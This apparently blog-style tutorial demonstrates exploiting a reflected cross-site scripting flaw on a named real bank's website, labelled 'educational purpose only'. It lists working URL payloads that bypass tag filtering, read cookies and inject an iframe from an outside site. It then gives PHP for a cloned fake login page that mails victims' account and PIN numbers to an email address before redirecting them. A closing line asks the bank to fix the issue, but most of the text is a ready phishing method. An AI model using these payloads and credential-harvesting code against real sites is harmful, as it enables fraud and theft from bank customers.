When XSS vulnerabilities on bank websites are exploited by phishers, is too late to undo the unwanted consequences. The phishers were able to inject a modified login form onto the bank’s login page, specifically an IFRAME which loads the fake login form from a web server. Even if the login page uses SSL, does not mean that is secure against XSS attacks. Web security unaware customers are easily tricked to enter sensitive personal information, especially if the cross-site scripting attack vector is obfuscated.

Cross site scripting (XSS) is where one site manages to run a script on another site, with the privileges of you, the user, Using a browser side scripting language (usually JavaScript). The goal of the attacker is to make the malicious script appear to be from the site being attacked, so the user’s browser can’t tell the script being executed is not meant to be aprt of the site they are viewing. This is usually accomplished by an attacker by submitting specially crafted values into the target site’s URL or web forms, or anywhere user generated content is displayed on the site.

Note: Educational purpose only.

Well, Let me show you something about Fake Login Page with XSS – Using IFRAME
First I’m going to visit the following site:

http://www.cbbankmm.com/gbps_meter.php?l=e

Yes, It’s normal, and try to insert some XSS scripts.

Basic XSS code:

http://www.cbbankmm.com/gbps_meter.php?l=e<script>alert("XSS")</script>

Nope,

Test again with these, Bypass the script tag filtering:

http://www.cbbankmm.com/gbps_meter.php?l=e'><script>alert("XSS")</script>

Grab Cookies with XSS

http://www.cbbankmm.com/gbps_meter.php?l=e'><script>alert(document.cookie)</script>

IFRAME

http://www.cbbankmm.com/gbps_meter.php?l=e'><iframe src="http://planetcreator.net"></iframe>

Finally : Let create Fake Login Page with PHP

– Clone Original Page

– Go to Login Form (tag)

– Write some script … That’s all.

<?php if(isset($_POST['submit'])) {
	error_reporting(0);
	$txtAccountNo = mysql_real_escape_string($_POST['txtAccountNo']);
	$txtPinCode = mysql_real_escape_string($_POST['txtPinCode']);
	$txtCapcha = mysql_real_escape_string($_POST['txtCapcha']);
	if($txtAccountNo==""){
		$msg="Your account number is empty";
	}elseif($txtPinCode==""){
		$msg="Your pin number is empty";
	}elseif($txtCapcha==""){
		$msg="Please enter your Capcha Code";
	}elseif($txtCapcha !="odj03I0"){
		$msg="Check Capcha code and type again";
	}else{
		$email_contents= $txtAccountNo." | ".$txtPinCode;
		$mail = mail("[email protected]", "Acc Info from CB", $email_contents);
		header("https://billing.yatanarpon.com.mm/electricity/cbbank/default.aspx?Type=Large");
	}
}
?>

This FAKE login form which can convince gather a user’s credentials such as Account and Pin Numbers. If the victim logs in via the fake login page, their Those Account and Pin is transmitted to the fraudsters and they are subsequently presented with original login page. Information requested includes Account Number. and Pin Number..

We hope that your security staff will look into this issue and fix it as soon as possible.